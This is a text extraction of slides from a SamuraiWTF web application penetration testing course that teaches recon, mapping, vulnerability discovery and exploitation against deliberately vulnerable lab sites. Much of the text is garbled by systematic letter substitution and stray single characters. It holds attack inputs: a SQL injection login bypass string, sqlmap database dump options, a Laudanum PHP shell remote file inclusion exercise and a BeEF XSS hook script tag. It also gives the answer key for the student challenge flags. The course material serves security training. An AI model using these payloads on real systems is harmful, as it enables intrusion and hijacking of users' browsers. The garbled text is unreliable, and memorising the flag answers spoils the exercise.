Professional Documents
Culture Documents
SamuraiWTF Course v17 - Slides
SamuraiWTF Course v17 - Slides
com
Assessing and Exploiting Web Applications
with SamuraiWTF
Justin Searle
Managing Partner UtiliSec
justin@meeas.com // justin@utilisec.com
+1 801 784 2052
2 Copyright 2012, 2013 Justin Searle www.utilisec.com
Zl based Course vlrLual Machlne
Make sure LhaL laLesL verslon of vMware layer
or luslon ls lnsLalled
vlrLual8ox should work, buL no promlses
Copy course les Lo your compuLer
unzlp Lhe SamuralW1l vlrLual machlne
lrom Lhe "llle" menu ln vMware, choose "Cpen"
and selecL Lhe .vmx le ln Lhe exLracLed folder
verlfy Lhe vlrLual machlne can communlcaLe on
Lhe neLwork lf you are connecLed Lo Lhe lnLerneL
3 Copyright 2012, 2013 Justin Searle www.utilisec.com
lSC based Course vlrLual Machlne
Copy Lhe SamuralW1l lSC le Lo your hard drlve
Cpen your vlrLual machlne soware and creaLe a new vlrLual
machlne wlLhouL uslng Lhe auLomauc lnsLallauon opuons
lf you are uslng vMware layer, WorksLauon, or luslon:
When warned abouL an lnsLallauon dlsk, selecL "Conunue wlLhouL dlsc"
When asked abouL lnsLallauon medla, choose "CreaLe a cusLom vlrLual
machlne" or "l wlll lnsLall Lhe operaung sysLem laLer"
When asked abouL your Cperaung SysLem choose "Llnux" and "ubunLu"
Clve Lhe vlrLual machlne 2C8 8AM
1ake defaulLs on all oLher semngs
Cnce creaLed, edlL your vlrLual machlne and polnL Lhe vM
machlne's Cu/uvu vlrLual drlve a Lhe SamuralW1l lSC
8ooL your vlrLual machlne and verlfy SamuralW1l sLarLs up
Look around and see lf your nelghbors need any help !
4 Copyright 2012, 2013 Justin Searle www.utilisec.com
Assessing and Exploiting Web Applications
with SamuraiWTF
Justin Searle
Managing Partner UtiliSec
justin@meeas.com // justin@utilisec.com
+1 801 784 2052
5 Copyright 2012, 2013 Justin Searle www.utilisec.com
CC Aurlbuuon-ShareAllke
For more details, visit http://creativecommons.org/licenses/by-sa/3.0/
If you use these slides, please offer the course under a different name so people don't confuse it with our official course.
6 Copyright 2012, 2013 Justin Searle www.utilisec.com
Course ConLrlbuLors
!"#$%& (#)*"$%
!usun Searle - [usun[uullsec.com - [meeas
8aul Slles - raul[Laddong.com - [Laddong
!"#$%& +,"-%"$%
uullSec - hup://www.uullsec.com
Secure ldeas L.L.C. - hup://www.secureldeas.neL
1addong S.L. - hup://www.Laddong.com
7 Copyright 2012, 2013 Justin Searle www.utilisec.com
Course CuLllne
lnLroducuon Lo SamuralW1l
1esung MeLhodology
Mapplng Appllcauons
ulscoverlng vulnerablllues
Lxplolung vulnerablllues
SLudenL Challenge
Appendlx MaLerlals (ume permlmng)
8 Copyright 2012, 2013 Justin Searle www.utilisec.com
SamuralW1l
Llve Lesung envlronmenL as a booLable uvu
8ased on ubunLu Llnux
Cver 100 Lools, exLenslons, and scrlpLs, lncluded:
- recon-ng
- w3af
- 8eLl
- 8urp SulLe
- CWAS ZA
- 8aL roxy
- ulr8usLer
- CeWL
- Sqlmap
- MalLego CL
- WebScarab
- nmap
- nlkLo
- MeLasplolL
9 Copyright 2012, 2013 Justin Searle www.utilisec.com
SamuralW1l 2.0
CompleLe rebulld of Lhe dlsLrlbuuon
lncludes kuL, Cnome, and unlLy
uoubled Lhe number of Lools
All Lools now accesslble ln $A1P
Moved all soware and congurauons Lo ueblan
packages... (work ln progress)
upgrade all Lools wlLh "sudo apL-geL upgrade"
Add SamuralW1l Lools Lo any ubunLu/ueblan
lnsLallauon by edlung "/eLc/apL/sources.llsL"
laclllLaLes collaborauon wlLhln dev Leam
10 Copyright 2012, 2013 Justin Searle www.utilisec.com
Maln pro[ecL page:
hup://www.samural-wu.org
8ug and feaLure requesLs Lrackers aL:
hups://sourceforge.neL/p/samural/bugs/
hups://sourceforge.neL/p/samural/feaLure-requesLs/
uevelopmenL malllng llsL aL:
hup://sourceforge.neL/p/samural/mallman/
ro[ecL Leads:
kevln !ohnson - k[ohnson[secureldeas.neL - [secureldeas
!usun Searle - [usun[uullsec.com - [meeas
8aul Slles - raul[Laddong.com - [Laddong
ro[ecL u8Ls
11 Copyright 2012, 2013 Justin Searle www.utilisec.com
Logglng ln and uslng sudo/kdesudo/gLksudo
username: samural
assword: samural
hup://whausLhesamuralpassword.com
Chooslng kuL, Cnome, or unlLy
SamuralW1l 1ools and uocumenLauon
llrefox LxLenslons
hups://addons.mozllla.org/en-uS/refox/collecuons/rslles/
samural/
Web-based 1ools and 1argeLs
WalkLhrough of SamuralW1l
12 Copyright 2012, 2013 Justin Searle www.utilisec.com
Because we are professional pen-testers
You cant see the wood for the trees
Testing Methodology
13 Copyright 2012, 2013 Justin Searle www.utilisec.com
8lack 8ox 1esung (eneLrauon 1esung)
Llule Lo no lnformauon ls provlded abouL Lhe LargeL
1esung Lechnlques sLarL wlLh looklng for speclc vulnerablllLy slgns buL
qulckly moves lnLo unscrlpLed explorauon, Lrlal and error
1esung focuses on manlpulaung lnpuLs and evaluaung responses
A form of reverse englneerlng of exposed funcuonallLy
WhlLe 8ox or CrysLal 8ox 1esung (noL enLesung)
lncludes securlLy focused Lesung llke:
source code revlews
auLhenucaLed vulnerablllLy assessmenLs
congurauon audlLs
More of a scrlpLed LesL looklng for speclc lLems
Crey 8ox 1esung (Cpumlzed eneLrauon 1esung)
1esung LhaL uses black box Lechnlques wlLh greaLer vlslblllLy and/or access
Lo Lhe appllcauon Lo opumlze Lesung
1ypes of 1esLs
14 Copyright 2012, 2013 Justin Searle www.utilisec.com
A slmple meLhodology:
.&/"-: CaLherlng lnformauon
from exLernal sources abouL
your LargeL
01,,2-3: Learnlng abouL Lhe
LargeL app from a user's Anu a
developer's perspecuve
42%/"5&$6: Learnlng Lhe app
from an auacker's perspecuve
78,9"2)1:"-: Auempung Lo
measure Lhe Lrue rlsk of
dlscovered vulnerablllues
Successful explolLauon oen
leads Lo new funcuonallLy Lo
map and a second layer of
vulnerablllues Lo dlscover
lormal MeLhodology
.&/"-
01,,2-3 78,9"2)1:"-
42%/"5&$6
15 Copyright 2012, 2013 Justin Searle www.utilisec.com
We sull follow Lhe overall
clockwlse ow, buL we oen
move back and forLh beLween
processes
1rlck ls Lo keep focused and
progresslng Lhrough Lhe sLeps
Ceneral rule for devlauon
from clockwlse progresslon:
Make lL a consclous declslon
LlmlL Lo 3 auempLs or 3 mlnuLes
uocumenL whaL you dld and
whaL you would do nexL
lorce yourself Lo reLurn Lo your
currenL meLhodology sLep
MeLhodology ln 8eal Llfe
.&/"-
01,,2-3 78,9"2)1:"-
42%/"5&$6
16 Copyright 2012, 2013 Justin Searle www.utilisec.com
Mutillidae are a family of wasps whose wingless females resemble ants. Their
common name velvet ant refers to their dense hair which may be red, black,
white, silver, or gold. They are known for their extremely painful sting,
facetiously said to be strong enough to kill a cow, hence the common name cow
killer or cow ant is applied to some species. -- Wikipedia
First Target: Dojo-Basic
17 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: !usun Searle
+2)&: (currenLly only avallable on SamuralW1l 2.x)
;#$,"%&: A P/MySCL web appllcauon LhaL
lmplemenLs Lhe CWAS 1op 10 vulnerablllues. 1hls
pro[ecL was forked from Adrlan "lrongeek" Crenshaw's
Lhe 1.x branch of Muullldae
(//&%%2-3: hup://do[o-baslc
<&1)#$&%:
8aslc web app deslgned for rsL ume web pen-LesLers
Lasy Lo nd and explolL vulnerablllues
lncludes learnlng hlnLs
Mapped Lo CWAS 1op 10
Samural uo[o-8aslc
18 Copyright 2012, 2013 Justin Searle www.utilisec.com
01,,2-3 =""9%:
nmap & Zenmap
llrefox
1llL
Wappalyzer
loxyroxy
ZA roxy
llrebug
ZA Splder
8urp Splder
42%/"5&$6 =""9%:
nlkLo
ulr8usLer
8a
ZA Scanner
w3af
lMacro
CeWL
ZA luzzer
ZA 1okenCen
8urpsulLe Sequencer
user AgenL SwlLcher
78,9"2)1:"- =""9%:
Cookles Manager+
sqlmap
Laudanum
8eLl
1esung lan for uo[o-8aslc
19 Copyright 2012, 2013 Justin Searle www.utilisec.com
Gathering information from external sources about your target
Vulnerability Discovery
53 Copyright 2012, 2013 Justin Searle www.utilisec.com
ulscovery 1asks
AuLhenucauon
Sesslon ManagemenL
AuLhorlzauon
u
e
f
a
u
l
L
C
o
n
g
u
r
a
u
o
n
8
u
s
l
n
e
s
s
L
o
g
l
c
C
o
d
e
l
n
[
e
c
u
o
n
u
e
n
l
a
l
o
f
S
e
r
v
l
c
e
C
l
l
e
n
L
-
S
l
d
e
C
o
d
e
Mapplng
LxplolLauon
54 Copyright 2012, 2013 Justin Searle www.utilisec.com
CWAS 1op 10
hups://www.owasp.org/lndex.php/
CaLegory:CWAS1op1enro[ecL
8uL Lhere are many more vulnerablllues
beyond Lhe 1op 10
Many vulnerablllues don'L L Lhe
descrlpuons of our common vulnerablllLy
caLegorles
Cen musL descrlbe Lhe vulnerablllues when
reporung on Lhem
So WhaL Are We Looklng lor?
55 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: Sullo
+2)&: hup://clrL.neL/nlkLo2
;#$,"%&: A web server scanner LhaL ngerprlnLs,
correlaLes Lo known vulnerablllues, and looks for
known mallclous or poLenually dangerous les/
CCls
>1-3#13&: erl
+6-)18:
nlkLo -hosL <LargeL>
nlkLo
56 Copyright 2012, 2013 Justin Searle www.utilisec.com
use nlkLo Lo scan do[o-baslc
8evlew Lhe resulLs and vlslL Lhe
"lnLeresung" pages
nlkLo Lxerclse
57 Copyright 2012, 2013 Justin Searle www.utilisec.com
ZA Appllcauon lnLegrauon
nikto
58 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: CWAS ro[ecL
+2)&: www.owasp.org/lndex.php/
CaLegory:CWASulr8usLerro[ecL
;#$,"%&: 8ruLe force of web dlrecLorles and les
>1-3#13&: !ava
;$"%:
very qulck for whaL lL does
Pas one of Lhe mosL exhausuve llsL (blg crawler on Lons of
webslLes), however Lhey are hlghly lnemclenL
!15&1)%:
Scans can Lake a vL8? long ume lf you use recurslon
Can overwhelm servers (connecuons and log dlsk sLorage)
ulr8usLer
59 Copyright 2012, 2013 Justin Searle www.utilisec.com
8efore you do anyLhlng, Lurn o recurslon!
1akes lC8LvL8!
Scan hup://do[o-baslc" wlLh Lhe small dlrecLory llsL
ulsable recurslve checks and bruLe force le checks
Whlle Lhe scan ls runnlng, experlmenL wlLh Lhe number
of Lhreads
8e careful over 10 Lhreads lf you are on ln a vlrLual machlne!
llndlng unllnked 8esources
60 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: 8a 1eam
+2)&: hup://code.google.com/p/ra
;#$,"%&: A sulLe of Lools LhaL uullze common shared
elemenLs Lo make Lesung and analysls easler. 1he Lool
(framework) provldes vlslblllLy ln Lo areas LhaL oLher
Lools do noL such as varlous cllenL slde sLorage
>1-3#13&: yLhon
<&1)#$&%:
Some of Lhe besL wordllsLs and newesL word llsLs for unllnked
les and dlrecLorles
!15&1):
ro[ecL ls only seml acuve and hasn'L had a sLable release yeL
8a
61 Copyright 2012, 2013 Justin Searle www.utilisec.com
use ZA's 8ruLe lorce Lools Lo scan for unllnked
resources ln uo[o-8aslc
ulsable recurslve checkbox ln Lhe opuons
use Lhe 8a les llsL
use Lhe 8a dlrecLory llsL
8a's unllnked 8esource LlsLs
62 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: Chrls ederlck
+2)&:
hup://addons.mozllla.org/en-uS/refox/addon/user-
agenL-swlLcher/
;#$,"%&: SwlLch Lhe user agenL of web browser
>1-3#13&: llrefox add-on
<&1)#$&%:
redened seL of user agenLs (lL, roboLs, lhone.)
llexlble edlLor Lo cusLomlze any user agenL
user AgenL SwlLcher
63 Copyright 2012, 2013 Justin Searle www.utilisec.com
uo dlerenL user agenLs show you dlerenL conLenL or
funcuonallLy?
1ry moblle browser useragenLs for lhone and Androld
1ry search englne useragenLs llke "CoogleboL"
1ry securlLy scan englnes llke Cualys and McAfee Secure
uon'L forgeL Lo swlLch back Lo your defaulL uA!!!
use ZA luzzer wlLh Lhe useragenL llsL from
luzzu8 Lo fuzz uo[o-8aslc's home page
1esung for user AgenL lssues
64 Copyright 2012, 2013 Justin Searle www.utilisec.com
8evlewlng asslve scan resulLs
SLarung and sLopplng acuve scans
8evlewlng Lhe alerLs
ZA Acuve Scannlng Lxerclses
65 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: Andres 8lancho and many oLhers
+2)&: w3af.sourceforge.neL
;#$,"%&: Cne of Lhe mosL feaLure rlch open source web
audlung Lools for boLh auLomaLed and seml-auLomaLed
;*1%&%: Mapplng, dlscovery, and explolLauon
>1-3#13&: yLhon
A")1B9& <&1)#$&%:
Cholce of Cul and CLl lnLerfaces
very scrlpLable Lo re-audlL apps
lncludes mosL pyLhon based web audlung Lools
!15&1)%: sLablllLy and conslsLency lssues
!!!nLvL8!!! enable all pluglns
w3af
66 Copyright 2012, 2013 Justin Searle www.utilisec.com
8aslc w3af AudlLs
2 - Target
67 Copyright 2012, 2013 Justin Searle www.utilisec.com
Chooslng Lhe pluglns Lo LesL wlLh
uslng Lhe websplder plugln for baslc splderlng
uslng Lhe splderman plugln Lo geL around
auLhenucauon and blackllsung lssues
8eadlng Lhe resulLs
uslng our "3 mlnuLes / 3 auempLs" rule Lo Lry
w3af's explolLauon feaLures
uslng w3af
68 Copyright 2012, 2013 Justin Searle www.utilisec.com
AuLomaLed Lools can only LesL lnpuLs LhaL Lhey
can nd
uo very well ndlng ln[ecuon aws
Some lnpuLs musL be manually LesLed lf Lhe
auLomaLed Lools can'L be Lralned Lo nd Lhem (Lhlnk
MvC archlLecLures and web servlces)
Loglc and archlLecLural aws musL be manually
LesLed slnce auLomaLed Lools cannoL undersLand
Lhe necessary conLexL
Also besL Lo manually check for hlgh-probablllLy
aws on ma[or lnpuLs
Manual ulscovery
69 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: lCpus
+2)&: hup://www.lopus.com/lmacros/refox/
;#$,"%&: 8ecord, edlL, and scrlpL macros ln
llrefox for auLomaLed funcuonallLy
>1-3#13&: llrefox add-on
<&1)#$&%:
8ecord your acuons and edlL Lhem laLer
use looplng and varlables Lo furLher cusLomlze
ull daLaseLs from exLernal sources (CSv, u8s, ...)
Wrap macros ln scrlpLs for advanced funcuons
lMacro
70 Copyright 2012, 2013 Justin Searle www.utilisec.com
uoes Lhe appllcauon auLhenucaLe users?
Pow do you logln, logouL, and change your
password?
Can you reseL or recover an accounL?
Are all of Lhese funcuons proLecLed by encrypuon?
uoes Lhe appllcauon reveal lf a username ls valld or
noL?
uoes Lhe appllcauon provlde user lockouL?
Can you guess any of Lhe passwords?
1esung AuLhenucauon
71 Copyright 2012, 2013 Justin Searle www.utilisec.com
AuLhor: ulglnln[a (8obln Wood)
SlLe: hup://www.dlglnln[a.org/pro[ecLs/cewl.php
urpose: A wordllsL generaLor whlch collecLs
words by splderlng webslLes
Language: 8uby
leaLures: CusLom dlcLs are very useful
SynLax:
cewl [opuons] <LargeL>
CeWL
72 Copyright 2012, 2013 Justin Searle www.utilisec.com
8evlew Lhe CeWL opuons
d: depLh
w: wrlLe Lo (dlcuonary) le
e: e-mall addresses
a: meLadaLa.
CreaLe a wordllsL for uo[o-8aslc
CeWL Lxerclse
73 Copyright 2012, 2013 Justin Searle www.utilisec.com
use ZA luzzer Lo fuzz Lhe logln password for
"admln"
use Lhe llsL generaLed by Cewl
Ad[usL ZA luzzer's Lhread opuons
use response le slze Lo nd Lhe successful fuzz
auempL
use Zap's search feaLure Lo nd Lhe successful fuzz
auempL
use ZA luzzer Lo fuzz Lhe logln
password for "[ohn"
use Lhe [ohn.LxL llsL from luzzu8
luzzlng Loglns
74 Copyright 2012, 2013 Justin Searle www.utilisec.com
uoes Lhe appllcauon Lrack sesslon sLaLe?
ls Lhe sesslon Loken predlcLable?
ls a new sesslon Loken provlded Lo you aL logln?
ls Lhe sesslon Loken deleLed upon logouL?
Are auLhenucaLed sesslon Lokens proLecLed by
encrypuon?
Are sesslon Loken cookle ags seL Lo secure and
PupCnly?
1esung Sesslon ManagemenL
75 Copyright 2012, 2013 Justin Searle www.utilisec.com
1ry copy/pasLe lnLo Coogle
lf ls a hash of a common number or word,
Coogle wlll probably know lL
use an advanced Lool Lo generaLe 1000+
Lokens and analyze Lhem
8eallze LhaL hashes of sequenual numbers wlll
look random even Lo Lhese Lools ......
When Sesslon Look 8andom
76 Copyright 2012, 2013 Justin Searle www.utilisec.com
Clear all cookles ln your browser
vlslL Lhe home page of uo[o-8aslc
llnd LhaL requesL ln ZA PlsLory
verlfy Lhe requesL was made wlLhouL cookles
and lLs response has a SeL-Cookle" for
sesslonld"
8lghL cllck requesL ln hlsLory and "CeneraLe
1okens..."
8evlew resulLs Lo verlfy LhaL
sesslon ls Lruly random (yes, lL ls)
ZA 1okenCen
77 Copyright 2012, 2013 Justin Searle www.utilisec.com
Clear all cookles ln your browser
vlslL Lhe home page of uo[o-8aslc
llnd LhaL requesL ln 8urp's roxy PlsLory Lab
verlfy Lhe requesL was made wlLhouL cookles
and lLs response has a SeL-Cookle" for
sesslonld"
8lghL cllck requesL ln hlsLory and "SenL Lo
Sequencer"
verlfy LhaL 8urp ldenued Lhe rlghL
sesslon cookle and analyze
Sesslon Analysls wlLh 8urp
78 Copyright 2012, 2013 Justin Searle www.utilisec.com
ls posL-auLhenucauon daLa or funcuonallLy
avallable Lo unauLhenucaLed users?
Can you manually make requesLs of
prlvlleged funcuonallLy or access prlvlleged
daLa whlle logged ln as an user LhaL should
noL have access Lo lL?
Can users access daLa from oLher users
LhaL Lhey should noL be able Lo
access?
1esung AuLhorlzauon
79 Copyright 2012, 2013 Justin Searle www.utilisec.com
Where does Lhe appllcauon accepL user lnpuL?
Whlch lnpuLs are reecLed back Lo Lhe user?
uo Lhey accepL and execuLe cllenL slde code such as !avascrlpL?
Whlch lnpuLs are used ln querles Lo a daLabase?
uo Lhey accepL and execuLe SCL commands?
uo any lnpuLs appear Lo be used wlLh sysLem commands?
uo Lhey accepL and execuLe addluonal sysLem commands?
uo any lnpuLs appear Lo reference local les?
Can you reference and read arblLrary les on Lhe le sysLem?
uoes Lhe app execuLe servers-slde scrlpLs lf referenced?
uo any lnpuLs appear Lo reference remoLe les?
Can you read oLher les on LhaL sysLem?
Can you read les on oLher sysLems?
uoes Lhe app execuLe server-slde scrlpLs?
1esung for ln[ecuon llaws
80 Copyright 2012, 2013 Justin Searle www.utilisec.com
osslble denlal of servlce lssues:
uo any requesLs Lake a relauvely long ume Lo
respond?
Can any lnpuLs force Lhe appllcauon Lo lncrease
processlng ume such as wlld card searches?
uo any lnpuLs appear Lo be wrluen Lo Lhe le sysLem
or log?
Can user accounLs be sysLemaucally locked ouL?
1esung for uenlal of Servlce
81 Copyright 2012, 2013 Justin Searle www.utilisec.com
1echnologles lnclude
!avaScrlpL / A!A
llash
!ava AppleLs
SllverllghL
Coals for cllenL-slde code Lesung
undersLand how Lhe cllenL slde code communlcaLes Lo/from Lhe web
appllcauon
use all funcuonallLy ln cllenL-slde code Lo map requesLs Lo Lhe web
appllcauon
ldenufy requesLs from cllenL-slde code LhaL were noL exposed ln your
lnLerface (for varlous reasons)
ldenufy oLher "lnLeresung" or "sensuve" daLa embedded ln Lhe cllenL-slde
code
LasL Lwo sLeps oen requlre us Lo decomplle Lhe cllenL-slde code
1esung CllenL-Slde Code
82 Copyright 2012, 2013 Justin Searle www.utilisec.com
Dojo-Basic Exploitation
83 Copyright 2012, 2013 Justin Searle www.utilisec.com
LxplolLauon 1asks
rlorluze AuempLs
LxplolLauon
osL LxplolLauon
ulscovery
8econ
84 Copyright 2012, 2013 Justin Searle www.utilisec.com
verlfylng ldenued vulnerablllues by auacklng
and explolung Lhem
Co aer Lhe daLa or funcuonallLy LhaL real
auackers would go aer
Successful explolLauon ls a sLepplng sLone and
should open up a new round of mapplng and
dlscovery
SLep 4: LxplolLauon
85 Copyright 2012, 2013 Justin Searle www.utilisec.com
uownloadlng Lhe conLenLs of a daLabase
uploadlng a mallclous web page
Calnlng shell on Lhe server
Maklng a LargeL server send daLa Lo a remoLe hosL
lvoung from Lhe uMZ Lo Lhe lnLernal neLwork
Leveraglng a LargeL user's browser Lo scan Lhe lnLernal
neLwork
Lxplolung LargeL user's browser vulnerablllues
LxplolLauon Lxamples
86 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: v[no
+2)&: addons.mozllla.org/en-uS/refox/addon/cookles-
manager-plus/
;#$,"%&: Add and edlL sesslon and perslsLenL cookles,
plus all Lhelr properues
>1-3#13&: llrefox add-on
<&1)#$&%:
Cookle semngs Lake prlorlLy over lnLernal cookles
Cookle search lLers
Cookles Manager+
87 Copyright 2012, 2013 Justin Searle www.utilisec.com
use Cookles Manager+ Lo log lnLo predlcLable sesslon
lus
use ZA Lo lnLercepL a requesL for one of your users
use ZA's Lncode/uecode/Pash Lool Lo generaLe a base64 of
anoLher user's ulu number
8eplace your user's ulu cookle wlLh Lhe new generaLed ulu
Sesslon Pl[acklng
88 Copyright 2012, 2013 Justin Searle www.utilisec.com
Cn Lhe "Logln" page:
8e sure you are nC1 logged ln
1ry logglng ln wlLh user "admln" and a slngle quoLe
for Lhe password
Why dld you geL an error page?
Make a logln requesL for user "admln" and ln Lhe
password eld, force a boolean Lrue condluon such
as:
a' or '1'='1
Why dld Lhls log you ln?
8aslc SCL ln[ecuon LxplolLauon
89 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: 8ernardo uamele A. C. (lnquls)
+2)&: hup://sqlmap.sourceforge.neL
;#$,"%&: An auLomaLed SCL ln[ecuon Lool LhaL boLh
deLecLs and explolLs SCL ln[ecuon aws on MySCL,
Cracle, osLgreSCL, and MS SCL Server
>1-3#13&: yLhon
<&1)#$&%: Check Lhe help (-h).
+6-)18:
sqlmap.py -u <LargeL> [opuons]
SCLMap
90 Copyright 2012, 2013 Justin Searle www.utilisec.com
8evlew Lhe opuons for sqlmap (-h)
8un sqlmap on SCL aw Lo verlfy lL can see lL
(dlscovery)
use sqlmap Lo explolL Lhe SCL aw
Lnumerauon Commands
--ngerprlnL --dbs --Lables --columns --counL
lnnlng Commands
-u daLabase -1 Lable
uumplng Lables
--dump
CS lnLeracuon
SCLMap Lxerclse
91 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$%: kevln !ohnson & !usun Searle
+2)&: laudanum.secureldeas.neL
;#$,"%&: a collecuon of ln[ecLable les, deslgned Lo be
used ln a penLesL when SCL ln[ecuon aws are found
and are ln muluple languages for dlerenL
envlronmenLs
;*1%&%: explolLauon
>1-3#13&%: asp, aspx, cfm, [sp, php
A")1B9& <&1)#$&%:
SecurlLy: AuLhenucauon & l address resLrlcuons
ayloads: dns, le, header, proxy, shell
!15&1)%: MusL remember Lo pre-congure payloads
Laudanum
92 Copyright 2012, 2013 Justin Searle www.utilisec.com
Congure a Laudanum P shell wlLh Lhe
approprlaLe username and l
Copy Lhe new le Lo your /var/www dlrecLory
use Lhe 8ll vulnerablllLy map Lo have Lhe do[o-
baslc appllcauon reLrleve and execuLe your code
you should have found and 8ll aw durlng your code
ln[ecuon Lesung
8ll Lxerclse
93 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: Wade Alcorn and oLhers
+2)&: hup://beefpro[ecL.com
;#$,"%&: A P (or 8uby) web-based lnLerface for
command and conLrol of SS-ed zomble browsers
lncludlng several explolLs and modules
>1-3#13&: P or 8uby
+1?#$12 A")&%:
?ou can sLarL 8eLl from Lhe maln
menu or you can [usL run "beef"
from any command prompL. Powever,
make sure you use <C18L> <C> keys
Lo sLop before closlng Lhe Lermlnal wlndow. lf you forgeL,
you'll have Lo do a "klllall ruby" Lo sLop 8eLl
8eLl
94 Copyright 2012, 2013 Justin Searle www.utilisec.com
SLarL beef from Lhe maln menu and leave LhaL new Lermlnal
wlndow open
Accesslng Lhe conLrol panel (user/pass ls beef/beef)
http://localhost:3000/ui/panel
Spawn a zomble example
http://localhost:3000/demos/basic.html
LxperlmenL wlLh Lhe dlerenL commands
lnserL Lhe followlng hook ln a Lhe perslsLenL SS aw:
<script src="http://localhost:3000/hook.js"></script>
use Lhe chromlum and konqueror browsers Lo vlslL Lhe
ln[ecL llnk and geL hooked lnLo 8eLl
8eLl Lxerclse
95 Copyright 2012, 2013 Justin Searle www.utilisec.com
?ou1ube Channel & 8log
hups://www.youLube.com/user/1he8eefpro[ecL
hup://blog.beefpro[ecL.com
1unnellngroxy (localhosL:6789)
8ecome Lhe vlcum user on Lhe web-app
8urp SulLe & sqlmap &. (same domaln)
ss8ays
MeLasplolL lnLegrauon
Plgh CuallLy" 8eLl
96 Copyright 2012, 2013 Justin Searle www.utilisec.com
Samurai Dojo Scavenger
A dojo (, dj) is a Japanese term which literally means "place of the way".
Initially, dj were adjunct to temples. The term can refer to a formal training
place for any of the Japanese do arts but typically it is considered the formal
gathering place for students of any Japanese martial arts style to conduct
training, examinations and other related encounters. -- Wikipedia
Student Challenge
97 Copyright 2012, 2013 Justin Searle www.utilisec.com
?ou can nd Lhe challenge aL:
hup://do[o-scavenger
CollecL as many keys as you can
up Lo 20 keys could be found
(err. buL lL appears some are broken ", buL 18 are ndable)
keys look llke: 1dcca23333272036f04fe8bf20edfce0"
A key lu wlll be wlLh or near" Lhe acLual key
such as kL?001dcca23333272036f04fe8bf20edfce0"
keys can be found ln all sLeps of Lhe meLhodology, so don'L
focus only on explolLauon
8onus polnLs:
Pow were Lhe keys generaLed?
Can you you calculaLe whaL Lhe 21sL key would be?
SLudenL Challenge
98 Copyright 2012, 2013 Justin Searle www.utilisec.com
The next page contains the Student Challenge answers.
Youve been warned.
STOP!!!
99 Copyright 2012, 2013 Justin Searle www.utilisec.com
So I lied about the next page containing the answer.
Its really the NEXT page.
(Full Disclosure: I Needed a second stop page because printed versions of these slides
have two slides showing per page...)
STOP NOW!
I'm not joking this time!
100 Copyright 2012, 2013 Justin Searle www.utilisec.com
key 00 cfcd208493d363ef66e7d9f98764da
allowed P11 meLhod ln C1lCnS meLhod response
key 01 a1d0c6e83f027327d8461063f4ac38a6
ln 18ACL le ln web rooL (/18ACL)
key 02 68d30a9394728bc39aa24be94b319d21
ln apache cong le for uo[o-Scavenger:
/eLc/apache2/slLes-avallable/do[o-scavenger
key 03 069039b7ef840f0c74a814ec9237b6ec
used as your sesslon varlable 10 of Lhe ume
key 04 006f32e9102a8d3be2fe3614f42ba989
hLml commenL on lndex.php
WalkLhrough: keys 0-4
101 Copyright 2012, 2013 Justin Searle www.utilisec.com
key 03 6f3ef77ac0e3619e98139e9b6febf337
php commenL on lndex.php
key 06 03c6b06932c730899bb03d998e631860
CL1 parameLer ln /admln/lndex.php form submlL
key 07 6883966fd8f918a4aa29be29d2c386
defaulL LexL for commenL" eld on conLacLus.php
lL ls aL Lhe bouom of Lhe eld, so scroll down
key 08 6833436e2fe46a9d49d3d3af4f37443d
hldden eld on supporL.php
key 09 8bf1211fd4b7b94328899de0a43b93
new P11 meLhod obLalned uslng Lhe SAMLL meLhod
WalkLhrough: keys 3-9
102 Copyright 2012, 2013 Justin Searle www.utilisec.com
key 10 b6f0479ae87d244973439c6124392772
base64 encoded meLa Lag on lndex.php
key 11 31d92be1c60d1db1d2e3e7a07da33b26
ln a le called "key11" ln Lhe unllnked dlrecLory crack"
key 12 b337e84de8732b27eda3a12363109e80
unS enLry ln a zone Lransfer
key 13 ed263bc903a3a097f61d3ec064d96d2e
hldden ln daLabase, use a sql ln[ecuon explolL Lo nd
key 14 daca41214b39c3dc66674d09081940f0
8esponse Lo logglng lnLo parLner user accounL "key"
WalkLhrough: keys 10-14
103 Copyright 2012, 2013 Justin Searle www.utilisec.com
key 13 9cc138f8dc04cbf16240daa92d8d30e2
dlssallow enLry ln roboLs.LxL
key 16 2dea61eed4bceec364a00113c4d21334
Allowed domaln ln crossdomaln.xml
key 17 d14220ee66aeec73c49038383428ec4c
new P11 header response value ln all responses
key 18 2823f4797102ce1a1aec03339cc16dd9
defaulL dlrecLory ln web rooL
key 19 9e3cfc48eccf81a0d37663e129aef3cb
bruLe force password abc123" on /admln/lndex.php
WalkLhrough: keys 13-19
104 Copyright 2012, 2013 Justin Searle www.utilisec.com
We wlll all conunue Lo learn ...
A few Lhlngs wlll help us down LhaL paLh
Conunue explorlng Lhe Lools
8ulld a LesL lab
1each oLhers
!oln pro[ecLs
nexL SLeps
105 Copyright 2012, 2013 Justin Searle www.utilisec.com
Web Services
106 Copyright 2012, 2013 Justin Searle www.utilisec.com
1esung web servlces doesn'L change our
meLhodology
lnsLead of a user lnLerface + proxy, we use
WSuLs (Web Servlce uenluon Language)
uocumenLauon on Lhe web servlce
Sample packeL capLures
lnLercepuon proxles mlghL be used lf we can geL
Lhe web servlce agenL Lo go Lhrough Lhem
Lasy wlLh cllenL-slde code ob[ecLs ln web apps
Works wlLh Lradluonal agenLs lf you can seL proxles
or make Lhem work wlLh LransparenL proxles
Web Servlces vs Web Apps
107 Copyright 2012, 2013 Justin Searle www.utilisec.com
AuLhor: SmarL8ear
SlLe: hup://www.soapul.org
urpose: an open source Lool LhaL allows you Lo easlly
and rapldly creaLe and execuLe auLomaLed funcuonal,
regresslon, compllance, and load LesLs for web servlces
Language: !ava
leaLures:
Cne of Lhe besL Lools for parslng WSuLs and creaung LesL
cases for each requesL
SupporLs boLh SCA and 8LS1 web servlces
Web Servlces
108 Copyright 2012, 2013 Justin Searle www.utilisec.com
1. Co Lo *G,HIIF5J1 and check ouL Lhelr sLandalone web servlces
2. SLarL Soapul and creaLe pro[ecLs for all Lhree servlces
CurrenL SamuralW1l has a broken menu lLem for Soapul, sLarL Lhls way
